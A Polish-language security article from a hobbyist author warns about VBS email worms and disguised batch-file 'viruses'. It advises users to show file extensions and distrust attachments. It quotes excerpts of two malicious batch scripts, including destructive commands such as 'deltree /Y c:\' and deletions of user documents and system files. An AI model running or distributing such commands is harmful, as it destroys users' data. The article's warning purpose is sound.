Wirusy i ta cała menażeria.

Redeemer

W tym artykule napiszę o najnowszych trendach w pisaniu wirusów oraz o kilku innych rzeczach związanych z bezpieczeństwem.

Hmmm.... każdy chyba pamięta Mellisę i cały bałagan? A co było z "I Love You"? Były to najnowsze wirusy które to zaszkodziły setkom tysięcy ludzi na całym świecie.

Najnowszym trendem są tak zwane VBSy, czyli skrypty które w pewien sposób najczęściej rozsyłały maile do ludzi z książki adresowej lub też szkodziły systemowi operacyjnemu. Na czym polega taka moc tych maili? Na ludzkiej naiwności. Chodzi o to że człowiek dostając list z tematem na przykład: Kocham się, na pewno zaraz go otworzy bo może to być wyznanie miłości. Jednak w tym przypadku nie jest tak. "Przezorny zawsze ubezpieczony", taka powinna być maksyma każdego internauty. Łatwowierność jest największym błędem internetowych nowicjuszy. Tak więc nie należy ufać żadnym listom z załącznikami, nawet od przyjaciela, gdyż może on miał wirusa i ten wirus powielając się przysłał swoją kopię tobie.

Jak się obronić przed takim przejawem wirusa? Przy VBSach należy dać w ustawieniach systemowych wyświetlanie odznaczyć ukrywanie rozszerzenia plików. Wtedy to będziemy widzieć jaki plik jest nam przesyłany. Jeśli jest to VBS pod przykrywką na przykład pliku pif, bat, exe czy też innego to należy od razu kasować go (chyba że ktoś składuje wirusy i powiększa kolekcje). Hmm... drugim sposobem jest bardzo częsta aktualizacja programu antywirusowego, takiego jak Norton Antyvirus. Inne sposoby są raczej nieskuteczne i niesatysfakcjonujące.

Drugą sprawą tematyki wirusów są tak zwane pliki batowe. Co to? Są to pliki *.exe przerobione z *.bat (za pomocą BAT2EXE). Przeważnie są to pliki, które w sposób destruktywny niszczą dane na twardym dysku. Takie pseudo wirusy tak jak VBSy żerują na ludzkiej naiwności i może się to skończyć źle. Ostatnio dostałem maila z... MONu czyli Ministerstwa Oświaty Narodowej i były tam te pliki batowe oczywiście. W załącznikach miały być pytania maturalne, jednak ich tam nie było tylko jakieś lamerstwa. Tak samo było z mailem z Gazety Wyborczej która to przesyłała program umożliwiający łamanie haseł skrzynek pocztowych. Oczywiście też tam był plik batowy. Ważne jest to że mail zawierać może dla niektórych dość przekonywujący tekst i wielu ludzi może się na to nabrać. Hmmm.... ja się w żadnym przypadku nie nabrałem :P. Maile zostały wysłane przez jakiegoś anonymous maila, a adres maila źródłowy został zaczerpnięty z odpowiednich instytucji.

Co do tych pytań maturalnych to ktoś był taki dowcipny że dał nawet jakieś tam pytania, jednak banalnie proste oraz procedurę kasującą kilka rzeczy z twardego dysku. Pozwolę sobie zacytować kawałek źródła.

>echo 5. Z czym historycznie kojarzysz miasto:
>echo a) Bialystok
>echo b) Legnica
>echo c) Oswiecim
>echo d) Sanok
>echo e) Skoczow
>del C:\Windows\Command\ega.cpi
>@echo off

Jak widać prócz pytań jest procedura kasująca plik ega.cpi. Plik ten potrzebny jest przy inicjalizacji systemu tak więc dla mniej obeznanych mógłby być to problem, dla bardziej nic trudnego. To była historia, a teraz polski:

>3Dos error: 816K00# - Please restart computer now ! c:\autoexec.bat
>deltree /Y c:\

Objawia się to niezbyt ciekawym poczynaniem, czyli kasowaniem całego c:\ (papa systemie).

Teraz o "Gazecie Wyborczej". Źródło:

>@echo off
>echo Ten wirus to protest przeciwko NOWEJ MATURZE
>echo Nie ma innego sposobu na zwrocenie uwagi ze technika nie maja szans jej zdac zwlaszcza z angielskiego
>echo Nie kazdego stac na kursy za 100 zl miesiecznie
>echo i w ogole ta matura jest wytworem jakiegos debila
>echo Z polskiego robi nauke scisla humanistom kaze zdawac matme.
>echo Narzuca tok myslenia autora testu. Nie mozna formulowac wlasnych zdan
>echo Sorry, ale inaczej nie dostane sie do mediow
>echo Jak jej nie zdejma beda nastepne wirusy
>echo Jeszcze bardziej destrukcyjne
>echo Wiem ze jestem szalencem ale mi nie zalezy
>echo Jak mnie zlapia to na jedno wyjdzie
>echo I tak popelnie samobojstwo.
>echo Kwestia czy po aresztowaniu czy po oblaniu matury
>del C:\Moje Dokumenty\*.doc
>del C:\Moje Dokumenty\*.txt
>del C:\Moje Dokumenty\*.html
>del C:\Windows\Command\ega.cpi
>del C:\Mp3\*.mp3
>del D:\Mp3\*.mp3
>@echo off

Hmmm... mamy tu dość nieciekawe rzeczy, bo troszkę może się nam pokasować. Jednak mamy tu już dużo do poczytania i bardziej sensownego. Co do natury protestu nie będę się rozpisywać bo mnie to już na szczęście nie dotyczy, a po drugie człowiek jest szalony :). Inną kwestią jest to, że chyba trafił z żądaniami nie pod ten adres co miał trafić, a w dodatku przez takie działanie może zniszczyć komuś dość dużo pracy i jest to godne potępienia.

Na zakończenie napisze że nie warto ufać temu że dostaje się maila z MONu czy też z innej instytucji, bo raczej żadna instytucja nigdy nie wyśle do zwykłego przeciętnego człowieka na przykład pytań maturalnych. Żerowanie na naiwności jest bardzo powszechne więc nie dajcie się nabrać.

Ps. Ministerstwo Oświaty Narodowej oraz Gazeta Wyborcza nie miała nic wspólnego z tym co opisywałem.

Redeemer
e-mail: redeemer@poczta.fm